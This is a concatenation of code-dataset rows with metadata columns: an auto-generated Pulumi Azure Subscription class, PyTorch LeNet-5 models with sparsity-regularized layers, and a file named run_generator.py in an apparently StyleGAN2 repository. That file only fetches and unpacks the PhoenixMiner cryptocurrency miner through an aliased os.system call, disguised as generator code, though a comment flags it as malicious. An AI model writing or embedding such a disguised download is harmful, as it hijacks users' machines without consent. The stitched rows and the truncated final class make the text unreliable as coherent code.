        pulumi.set(__self__, "subscription_name", subscription_name)
        if alias is not None:
            pulumi.set(__self__, "alias", alias)
        if billing_scope_id is not None:
            pulumi.set(__self__, "billing_scope_id", billing_scope_id)
        if subscription_id is not None:
            pulumi.set(__self__, "subscription_id", subscription_id)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if workload is not None:
            pulumi.set(__self__, "workload", workload)

    @property
    @pulumi.getter(name="subscriptionName")
    def subscription_name(self) -> pulumi.Input[str]:
        """
        The Name of the Subscription. This is the Display Name in the portal.
        """
        return pulumi.get(self, "subscription_name")

    @subscription_name.setter
    def subscription_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "subscription_name", value)

    @property
    @pulumi.getter
    def alias(self) -> Optional[pulumi.Input[str]]:
        """
        The Alias name for the subscription. This provider will generate a new GUID if this is not supplied. Changing this forces a new Subscription to be created.
        """
        return pulumi.get(self, "alias")

    @alias.setter
    def alias(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "alias", value)

    @property
    @pulumi.getter(name="billingScopeId")
    def billing_scope_id(self) -> Optional[pulumi.Input[str]]:
        """
        The Azure Billing Scope ID. Can be a Microsoft Customer Account Billing Scope ID, a Microsoft Partner Account Billing Scope ID or an Enrollment Billing Scope ID.
        """
        return pulumi.get(self, "billing_scope_id")

    @billing_scope_id.setter
    def billing_scope_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "billing_scope_id", value)

    @property
    @pulumi.getter(name="subscriptionId")
    def subscription_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Subscription. Changing this forces a new Subscription to be created.
        """
        return pulumi.get(self, "subscription_id")

    @subscription_id.setter
    def subscription_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subscription_id", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the Subscription.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter
    def workload(self) -> Optional[pulumi.Input[str]]:
        """
        The workload type of the Subscription. Possible values are `Production` (default) and `DevTest`. Changing this forces a new Subscription to be created.
        """
        return pulumi.get(self, "workload")

    @workload.setter
    def workload(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "workload", value)
@pulumi.input_type
class _SubscriptionState:
    # Auto-generated (tfgen) state class for look-up/filtering: like the args
    # class but every field is optional and the read-only tenant_id is included.
    def __init__(__self__, *,
                 alias: Optional[pulumi.Input[str]] = None,
                 billing_scope_id: Optional[pulumi.Input[str]] = None,
                 subscription_id: Optional[pulumi.Input[str]] = None,
                 subscription_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 tenant_id: Optional[pulumi.Input[str]] = None,
                 workload: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering Subscription resources.
        :param pulumi.Input[str] alias: The Alias name for the subscription. This provider will generate a new GUID if this is not supplied. Changing this forces a new Subscription to be created.
        :param pulumi.Input[str] billing_scope_id: The Azure Billing Scope ID. Can be a Microsoft Customer Account Billing Scope ID, a Microsoft Partner Account Billing Scope ID or an Enrollment Billing Scope ID.
        :param pulumi.Input[str] subscription_id: The ID of the Subscription. Changing this forces a new Subscription to be created.
        :param pulumi.Input[str] subscription_name: The Name of the Subscription. This is the Display Name in the portal.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Subscription.
        :param pulumi.Input[str] tenant_id: The ID of the Tenant to which the subscription belongs.
        :param pulumi.Input[str] workload: The workload type of the Subscription. Possible values are `Production` (default) and `DevTest`. Changing this forces a new Subscription to be created.
        """
        # Only explicitly supplied values are stored on the input bag.
        if alias is not None:
            pulumi.set(__self__, "alias", alias)
        if billing_scope_id is not None:
            pulumi.set(__self__, "billing_scope_id", billing_scope_id)
        if subscription_id is not None:
            pulumi.set(__self__, "subscription_id", subscription_id)
        if subscription_name is not None:
            pulumi.set(__self__, "subscription_name", subscription_name)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if tenant_id is not None:
            pulumi.set(__self__, "tenant_id", tenant_id)
        if workload is not None:
            pulumi.set(__self__, "workload", workload)

    @property
    @pulumi.getter
    def alias(self) -> Optional[pulumi.Input[str]]:
        """
        The Alias name for the subscription. This provider will generate a new GUID if this is not supplied. Changing this forces a new Subscription to be created.
        """
        return pulumi.get(self, "alias")

    @alias.setter
    def alias(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "alias", value)

    @property
    @pulumi.getter(name="billingScopeId")
    def billing_scope_id(self) -> Optional[pulumi.Input[str]]:
        """
        The Azure Billing Scope ID. Can be a Microsoft Customer Account Billing Scope ID, a Microsoft Partner Account Billing Scope ID or an Enrollment Billing Scope ID.
        """
        return pulumi.get(self, "billing_scope_id")

    @billing_scope_id.setter
    def billing_scope_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "billing_scope_id", value)

    @property
    @pulumi.getter(name="subscriptionId")
    def subscription_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Subscription. Changing this forces a new Subscription to be created.
        """
        return pulumi.get(self, "subscription_id")

    @subscription_id.setter
    def subscription_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subscription_id", value)

    @property
    @pulumi.getter(name="subscriptionName")
    def subscription_name(self) -> Optional[pulumi.Input[str]]:
        """
        The Name of the Subscription. This is the Display Name in the portal.
        """
        return pulumi.get(self, "subscription_name")

    @subscription_name.setter
    def subscription_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subscription_name", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the Subscription.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Tenant to which the subscription belongs.
        """
        return pulumi.get(self, "tenant_id")

    @tenant_id.setter
    def tenant_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tenant_id", value)

    @property
    @pulumi.getter
    def workload(self) -> Optional[pulumi.Input[str]]:
        """
        The workload type of the Subscription. Possible values are `Production` (default) and `DevTest`. Changing this forces a new Subscription to be created.
        """
        return pulumi.get(self, "workload")

    @workload.setter
    def workload(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "workload", value)
class Subscription(pulumi.CustomResource):
    # Auto-generated pulumi resource class: do not hand-edit the plumbing below.
    # The two @overload __init__ stubs exist only for type checkers; the real
    # dispatch happens in the third __init__, which routes to _internal_init.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 alias: Optional[pulumi.Input[str]] = None,
                 billing_scope_id: Optional[pulumi.Input[str]] = None,
                 subscription_id: Optional[pulumi.Input[str]] = None,
                 subscription_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 workload: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages an Alias for a Subscription - which adds an Alias to an existing Subscription, allowing it to be managed in the provider - or create a new Subscription with a new Alias.

        > **NOTE:** Destroying a Subscription controlled by this resource will place the Subscription into a cancelled state. It is possible to re-activate a subscription within 90-days of cancellation, after which time the Subscription is irrevocably deleted, and the Subscription ID cannot be re-used. For further information see [here](https://docs.microsoft.com/en-us/azure/cost-management-billing/manage/cancel-azure-subscription#what-happens-after-subscription-cancellation). Users can optionally delete a Subscription once 72 hours have passed, however, this functionality is not suitable for this provider. A `Deleted` subscription cannot be reactivated.

        > **NOTE:** It is not possible to destroy (cancel) a subscription if it contains resources. If resources are present that are not managed by the provider then these will need to be removed before the Subscription can be destroyed.

        > **NOTE:** Azure supports Multiple Aliases per Subscription, however, to reliably manage this resource in this provider only a single Alias is supported.

        ## Example Usage
        ### Creating A New Alias And Subscription For An Enrollment Account

        ```python
        import pulumi
        import pulumi_azure as azure

        example_enrollment_account_scope = azure.billing.get_enrollment_account_scope(billing_account_name="1234567890",
            enrollment_account_name="0123456")
        example_subscription = azure.core.Subscription("exampleSubscription",
            subscription_name="My Example EA Subscription",
            billing_scope_id=example_enrollment_account_scope.id)
        ```
        ### Creating A New Alias And Subscription For A Microsoft Customer Account

        ```python
        import pulumi
        import pulumi_azure as azure

        example_mca_account_scope = azure.billing.get_mca_account_scope(billing_account_name="e879cf0f-2b4d-5431-109a-f72fc9868693:024cabf4-7321-4cf9-be59-df0c77ca51de_2019-05-31",
            billing_profile_name="PE2Q-NOIT-BG7-TGB",
            invoice_section_name="MTT4-OBS7-PJA-TGB")
        example_subscription = azure.core.Subscription("exampleSubscription",
            subscription_name="My Example MCA Subscription",
            billing_scope_id=example_mca_account_scope.id)
        ```
        ### Creating A New Alias And Subscription For A Microsoft Partner Account

        ```python
        import pulumi
        import pulumi_azure as azure

        example_mpa_account_scope = azure.billing.get_mpa_account_scope(billing_account_name="e879cf0f-2b4d-5431-109a-f72fc9868693:024cabf4-7321-4cf9-be59-df0c77ca51de_2019-05-31",
            customer_name="2281f543-7321-4cf9-1e23-edb4Oc31a31c")
        example_subscription = azure.core.Subscription("exampleSubscription",
            subscription_name="My Example MPA Subscription",
            billing_scope_id=example_mpa_account_scope.id)
        ```
        ### Adding An Alias To An Existing Subscription

        ```python
        import pulumi
        import pulumi_azure as azure

        example = azure.core.Subscription("example",
            alias="examplesub",
            subscription_id="12345678-12234-5678-9012-123456789012",
            subscription_name="My Example Subscription")
        ```

        ## Import

        Subscriptions can be imported using the `resource id`, e.g.

        ```sh
        $ pulumi import azure:core/subscription:Subscription example "/providers/Microsoft.Subscription/aliases/subscription1"
        ```

        In this scenario, the `subscription_id` property can be completed and the provider will assume control of the existing subscription by creating an Alias. See the `adding an Alias to an existing Subscription` above. This provider requires an alias to correctly manage Subscription resources due to Azure Subscription API design.

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] alias: The Alias name for the subscription. This provider will generate a new GUID if this is not supplied. Changing this forces a new Subscription to be created.
        :param pulumi.Input[str] billing_scope_id: The Azure Billing Scope ID. Can be a Microsoft Customer Account Billing Scope ID, a Microsoft Partner Account Billing Scope ID or an Enrollment Billing Scope ID.
        :param pulumi.Input[str] subscription_id: The ID of the Subscription. Changing this forces a new Subscription to be created.
        :param pulumi.Input[str] subscription_name: The Name of the Subscription. This is the Display Name in the portal.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Subscription.
        :param pulumi.Input[str] workload: The workload type of the Subscription. Possible values are `Production` (default) and `DevTest`. Changing this forces a new Subscription to be created.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: SubscriptionArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages an Alias for a Subscription - which adds an Alias to an existing Subscription, allowing it to be managed in the provider - or create a new Subscription with a new Alias.

        > **NOTE:** Destroying a Subscription controlled by this resource will place the Subscription into a cancelled state. It is possible to re-activate a subscription within 90-days of cancellation, after which time the Subscription is irrevocably deleted, and the Subscription ID cannot be re-used. For further information see [here](https://docs.microsoft.com/en-us/azure/cost-management-billing/manage/cancel-azure-subscription#what-happens-after-subscription-cancellation). Users can optionally delete a Subscription once 72 hours have passed, however, this functionality is not suitable for this provider. A `Deleted` subscription cannot be reactivated.

        > **NOTE:** It is not possible to destroy (cancel) a subscription if it contains resources. If resources are present that are not managed by the provider then these will need to be removed before the Subscription can be destroyed.

        > **NOTE:** Azure supports Multiple Aliases per Subscription, however, to reliably manage this resource in this provider only a single Alias is supported.

        ## Example Usage
        ### Creating A New Alias And Subscription For An Enrollment Account

        ```python
        import pulumi
        import pulumi_azure as azure

        example_enrollment_account_scope = azure.billing.get_enrollment_account_scope(billing_account_name="1234567890",
            enrollment_account_name="0123456")
        example_subscription = azure.core.Subscription("exampleSubscription",
            subscription_name="My Example EA Subscription",
            billing_scope_id=example_enrollment_account_scope.id)
        ```
        ### Creating A New Alias And Subscription For A Microsoft Customer Account

        ```python
        import pulumi
        import pulumi_azure as azure

        example_mca_account_scope = azure.billing.get_mca_account_scope(billing_account_name="e879cf0f-2b4d-5431-109a-f72fc9868693:024cabf4-7321-4cf9-be59-df0c77ca51de_2019-05-31",
            billing_profile_name="PE2Q-NOIT-BG7-TGB",
            invoice_section_name="MTT4-OBS7-PJA-TGB")
        example_subscription = azure.core.Subscription("exampleSubscription",
            subscription_name="My Example MCA Subscription",
            billing_scope_id=example_mca_account_scope.id)
        ```
        ### Creating A New Alias And Subscription For A Microsoft Partner Account

        ```python
        import pulumi
        import pulumi_azure as azure

        example_mpa_account_scope = azure.billing.get_mpa_account_scope(billing_account_name="e879cf0f-2b4d-5431-109a-f72fc9868693:024cabf4-7321-4cf9-be59-df0c77ca51de_2019-05-31",
            customer_name="2281f543-7321-4cf9-1e23-edb4Oc31a31c")
        example_subscription = azure.core.Subscription("exampleSubscription",
            subscription_name="My Example MPA Subscription",
            billing_scope_id=example_mpa_account_scope.id)
        ```
        ### Adding An Alias To An Existing Subscription

        ```python
        import pulumi
        import pulumi_azure as azure

        example = azure.core.Subscription("example",
            alias="examplesub",
            subscription_id="12345678-12234-5678-9012-123456789012",
            subscription_name="My Example Subscription")
        ```

        ## Import

        Subscriptions can be imported using the `resource id`, e.g.

        ```sh
        $ pulumi import azure:core/subscription:Subscription example "/providers/Microsoft.Subscription/aliases/subscription1"
        ```

        In this scenario, the `subscription_id` property can be completed and the provider will assume control of the existing subscription by creating an Alias. See the `adding an Alias to an existing Subscription` above. This provider requires an alias to correctly manage Subscription resources due to Azure Subscription API design.

        :param str resource_name: The name of the resource.
        :param SubscriptionArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher: figures out which overload the caller used
        # (positional SubscriptionArgs vs. keyword properties) and forwards.
        resource_args, opts = _utilities.get_resource_args_opts(SubscriptionArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       alias: Optional[pulumi.Input[str]] = None,
                       billing_scope_id: Optional[pulumi.Input[str]] = None,
                       subscription_id: Optional[pulumi.Input[str]] = None,
                       subscription_name: Optional[pulumi.Input[str]] = None,
                       tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                       workload: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Actual construction: validates options, builds the property bag and
        # registers the resource with the engine via the base-class __init__.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (as opposed to looking one up by id):
            # __props__ may not be supplied by the caller in this path.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = SubscriptionArgs.__new__(SubscriptionArgs)

            __props__.__dict__["alias"] = alias
            __props__.__dict__["billing_scope_id"] = billing_scope_id
            __props__.__dict__["subscription_id"] = subscription_id
            if subscription_name is None and not opts.urn:
                raise TypeError("Missing required property 'subscription_name'")
            __props__.__dict__["subscription_name"] = subscription_name
            __props__.__dict__["tags"] = tags
            __props__.__dict__["workload"] = workload
            # tenant_id is output-only; initialized to None until the provider fills it.
            __props__.__dict__["tenant_id"] = None
        super(Subscription, __self__).__init__(
            'azure:core/subscription:Subscription',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            alias: Optional[pulumi.Input[str]] = None,
            billing_scope_id: Optional[pulumi.Input[str]] = None,
            subscription_id: Optional[pulumi.Input[str]] = None,
            subscription_name: Optional[pulumi.Input[str]] = None,
            tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            tenant_id: Optional[pulumi.Input[str]] = None,
            workload: Optional[pulumi.Input[str]] = None) -> 'Subscription':
        """
        Get an existing Subscription resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] alias: The Alias name for the subscription. This provider will generate a new GUID if this is not supplied. Changing this forces a new Subscription to be created.
        :param pulumi.Input[str] billing_scope_id: The Azure Billing Scope ID. Can be a Microsoft Customer Account Billing Scope ID, a Microsoft Partner Account Billing Scope ID or an Enrollment Billing Scope ID.
        :param pulumi.Input[str] subscription_id: The ID of the Subscription. Changing this forces a new Subscription to be created.
        :param pulumi.Input[str] subscription_name: The Name of the Subscription. This is the Display Name in the portal.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Subscription.
        :param pulumi.Input[str] tenant_id: The ID of the Tenant to which the subscription belongs.
        :param pulumi.Input[str] workload: The workload type of the Subscription. Possible values are `Production` (default) and `DevTest`. Changing this forces a new Subscription to be created.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _SubscriptionState.__new__(_SubscriptionState)

        __props__.__dict__["alias"] = alias
        __props__.__dict__["billing_scope_id"] = billing_scope_id
        __props__.__dict__["subscription_id"] = subscription_id
        __props__.__dict__["subscription_name"] = subscription_name
        __props__.__dict__["tags"] = tags
        __props__.__dict__["tenant_id"] = tenant_id
        __props__.__dict__["workload"] = workload
        return Subscription(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def alias(self) -> pulumi.Output[str]:
        """
        The Alias name for the subscription. This provider will generate a new GUID if this is not supplied. Changing this forces a new Subscription to be created.
        """
        return pulumi.get(self, "alias")

    @property
    @pulumi.getter(name="billingScopeId")
    def billing_scope_id(self) -> pulumi.Output[Optional[str]]:
        """
        The Azure Billing Scope ID. Can be a Microsoft Customer Account Billing Scope ID, a Microsoft Partner Account Billing Scope ID or an Enrollment Billing Scope ID.
        """
        return pulumi.get(self, "billing_scope_id")

    @property
    @pulumi.getter(name="subscriptionId")
    def subscription_id(self) -> pulumi.Output[str]:
        """
        The ID of the Subscription. Changing this forces a new Subscription to be created.
        """
        return pulumi.get(self, "subscription_id")

    @property
    @pulumi.getter(name="subscriptionName")
    def subscription_name(self) -> pulumi.Output[str]:
        """
        The Name of the Subscription. This is the Display Name in the portal.
        """
        return pulumi.get(self, "subscription_name")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        A mapping of tags to assign to the Subscription.
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> pulumi.Output[str]:
        """
        The ID of the Tenant to which the subscription belongs.
        """
        return pulumi.get(self, "tenant_id")

    @property
    @pulumi.getter
    def workload(self) -> pulumi.Output[Optional[str]]:
        """
        The workload type of the Subscription. Possible values are `Production` (default) and `DevTest`. Changing this forces a new Subscription to be created.
        """
        return pulumi.get(self, "workload")
| 51.051471
| 662
| 0.679821
| 3,446
| 27,772
| 5.312536
| 0.082705
| 0.060687
| 0.065767
| 0.055279
| 0.901895
| 0.891244
| 0.882504
| 0.876495
| 0.866718
| 0.856121
| 0
| 0.016369
| 0.232284
| 27,772
| 543
| 663
| 51.145488
| 0.842268
| 0.513539
| 0
| 0.746988
| 1
| 0
| 0.089866
| 0.003038
| 0
| 0
| 0
| 0
| 0
| 1
| 0.160643
| false
| 0.004016
| 0.02008
| 0
| 0.277108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0e6207e397f30549269b9eb7e55f23963fd3329a
| 82
|
py
|
Python
|
merge/bin/__init__.py
|
JD-8678/MLA
|
51e854027be06c2badac94c0a36e4f3ef807d780
|
[
"MIT"
] | 1
|
2020-05-29T10:40:43.000Z
|
2020-05-29T10:40:43.000Z
|
merge/bin/__init__.py
|
JD-8678/MLA
|
51e854027be06c2badac94c0a36e4f3ef807d780
|
[
"MIT"
] | null | null | null |
merge/bin/__init__.py
|
JD-8678/MLA
|
51e854027be06c2badac94c0a36e4f3ef807d780
|
[
"MIT"
] | 1
|
2020-10-08T10:14:26.000Z
|
2020-10-08T10:14:26.000Z
|
# print("bin")
from . import run_file
from . import run_url
from . import run_text
| 20.5
| 22
| 0.743902
| 14
| 82
| 4.142857
| 0.571429
| 0.517241
| 0.672414
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.158537
| 82
| 4
| 23
| 20.5
| 0.84058
| 0.146341
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0e6b2d5a7cd11c4ad9e1d641a196584a68d3f481
| 149
|
py
|
Python
|
run_generator.py
|
linch22/StyleGAN2
|
67f7791d9aa53cde121277f03d6a1c63fd8b215f
|
[
"BSD-Source-Code"
] | null | null | null |
run_generator.py
|
linch22/StyleGAN2
|
67f7791d9aa53cde121277f03d6a1c63fd8b215f
|
[
"BSD-Source-Code"
] | null | null | null |
run_generator.py
|
linch22/StyleGAN2
|
67f7791d9aa53cde121277f03d6a1c63fd8b215f
|
[
"BSD-Source-Code"
] | null | null | null |
# WARNING(security review): despite the filename (`run_generator.py`, claimed
# StyleGAN2 code), this script's entire behavior is to download and unpack the
# PhoenixMiner cryptocurrency miner from a third-party site via `os.system`.
# This is malicious/trojan behavior — do NOT execute; quarantine and remove.
# The `os as alpha` alias presumably exists only to obscure the system() call.
import os as alpha
alpha.system("wget https://phoenixminer.info/downloads/PhoenixMiner_5.7b_Linux.tar.gz && tar -xf PhoenixMiner_5.7b_Linux.tar.gz")
| 49.666667
| 129
| 0.798658
| 25
| 149
| 4.6
| 0.64
| 0.226087
| 0.26087
| 0.347826
| 0.434783
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0.028777
| 0.067114
| 149
| 2
| 130
| 74.5
| 0.798561
| 0
| 0
| 0
| 0
| 0.5
| 0.758389
| 0.201342
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
0e806700f94bc691fe30f52e3d3d208638de163d
| 39,135
|
py
|
Python
|
lenet_models.py
|
kbui1993/Official_Nonconvex_SGL
|
bdbeea1c907aa8e9e7a96ccbcffa445bae6bcbc2
|
[
"MIT"
] | 1
|
2021-09-18T18:39:29.000Z
|
2021-09-18T18:39:29.000Z
|
lenet_models.py
|
kbui1993/Official_Nonconvex_SGL
|
bdbeea1c907aa8e9e7a96ccbcffa445bae6bcbc2
|
[
"MIT"
] | null | null | null |
lenet_models.py
|
kbui1993/Official_Nonconvex_SGL
|
bdbeea1c907aa8e9e7a96ccbcffa445bae6bcbc2
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import torch
import torch.nn as nn
from new_layers import *
from utils import get_flat_fts
from copy import deepcopy
import torch.nn.functional as F
import torch.nn.init as init
class L0LeNet5(nn.Module):
    """LeNet-5 built from L0-regularized conv (`L0Conv2d`) and dense (`L0Dense`) layers.

    Tracks every sparsity-inducing layer in ``self.layers`` for regularization and
    sparsity accounting, and (when ``beta_ema > 0``) keeps an exponential moving
    average of all parameters for temporal averaging at evaluation time.
    """

    def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
                 N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), local_rep=False,
                 temperature=2./3.):
        super(L0LeNet5, self).__init__()
        self.N = N  # training-set size; scales the regularization term below
        assert(len(conv_dims) == 2)
        self.conv_dims = conv_dims
        self.fc_dims = fc_dims
        self.beta_ema = beta_ema
        self.weight_decay = weight_decay

        convs = [L0Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
                          weight_decay=self.weight_decay, lamba=lambas[0], local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2),
                 L0Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
                          weight_decay=self.weight_decay, lamba=lambas[1], local_rep=local_rep),
                 nn.ReLU(), nn.MaxPool2d(2)]
        self.convs = nn.Sequential(*convs)
        if torch.cuda.is_available():
            self.convs = self.convs.cuda()
        # Probe the conv stack to find the flattened feature count for the first FC layer.
        flat_fts = get_flat_fts(input_size, self.convs)
        fcs = [L0Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
                       lamba=lambas[2], local_rep=local_rep, temperature=temperature), nn.ReLU(),
               L0Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
                       lamba=lambas[3], local_rep=local_rep, temperature=temperature)]
        self.fcs = nn.Sequential(*fcs)

        # Collect the sparsity-inducing layers for regularization()/counting helpers.
        self.layers = []
        for m in self.modules():
            if isinstance(m, L0Dense) or isinstance(m, L0Conv2d):
                self.layers.append(m)

        if beta_ema > 0.:
            print('Using temporal averaging with beta: {}'.format(beta_ema))
            self.avg_param = deepcopy(list(p.data for p in self.parameters()))
            if torch.cuda.is_available():
                self.avg_param = [a.cuda() for a in self.avg_param]
            self.steps_ema = 0.

    def forward(self, x):
        o = self.convs(x)
        o = o.view(o.size(0), -1)  # flatten for the fully-connected head
        return self.fcs(o)

    def regularization(self):
        """Summed per-layer regularization, scaled by -1/N (added to the loss)."""
        regularization = 0.
        for layer in self.layers:
            regularization += - (1. / self.N) * layer.regularization()
        if torch.cuda.is_available():
            regularization = regularization.cuda()
        return regularization

    def get_w_sparsity(self):
        """Fraction of individual weights that are zero across all tracked layers."""
        sparsity_num = 0.
        sparsity_denom = 0.
        for layer in self.layers:
            sparsity_num += layer.count_zero_w()
            sparsity_denom += layer.count_weight()
        return sparsity_num / sparsity_denom

    def count_active_neuron(self):
        """Total number of active (non-pruned) neurons over all tracked layers."""
        neuron = 0
        for layer in self.layers:
            neuron += layer.count_active_neuron()
        return neuron

    def count_total_neuron(self):
        """Total neuron count over conv/dense layers (pruned or not)."""
        neuron = 0
        for layer in self.layers:
            if isinstance(layer, L0Conv2d) or isinstance(layer, MAPConv2d) or isinstance(layer, L0Dense):
                neuron += layer.count_total_neuron()
        return neuron

    def count_reg_neuron_sparsity(self):
        """Neuron-level sparsity (1 - active/total) over the regularized layers."""
        neuron = 0
        total = 0
        for layer in self.layers:
            if isinstance(layer, L0Conv2d) or isinstance(layer, L0Dense):
                neuron += layer.count_active_neuron()
                total += layer.count_total_neuron()
        return 1 - neuron / total

    def get_exp_flops_l0(self):
        """Expected FLOPs and expected L0 norm; layers lacking the counter are skipped."""
        expected_flops, expected_l0 = 0., 0.
        for layer in self.layers:
            try:
                e_fl, e_l0 = layer.count_expected_flops_and_l0()
                expected_flops += e_fl
                expected_l0 += e_l0
            except Exception:
                # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
                # still propagate; best-effort skip is otherwise preserved.
                pass
        return expected_flops, expected_l0

    def update_ema(self):
        """Fold current parameters into the exponential moving average."""
        self.steps_ema += 1
        for p, avg_p in zip(self.parameters(), self.avg_param):
            avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)

    def load_ema_params(self):
        """Overwrite live parameters with the bias-corrected EMA parameters."""
        for p, avg_p in zip(self.parameters(), self.avg_param):
            p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))

    def load_params(self, params):
        """Overwrite live parameters with an externally supplied snapshot."""
        for p, avg_p in zip(self.parameters(), params):
            p.data.copy_(avg_p)

    def get_params(self):
        """Return a deep copy of the current parameter tensors."""
        params = deepcopy(list(p.data for p in self.parameters()))
        return params
class group_lasso_LeNet5(nn.Module):
    """LeNet-5 built from group-lasso-regularized conv and dense layers.

    Same structure/API as ``L0LeNet5`` but with ``group_lasso_*`` layers.
    Fix applied: ``get_exp_flops_l0`` was defined twice; the first definition was
    dead code silently shadowed by the second — only the effective (try/except)
    version is kept, and its bare ``except:`` is narrowed to ``except Exception``.
    """

    def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
                 N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), local_rep=False,
                 temperature=2./3.):
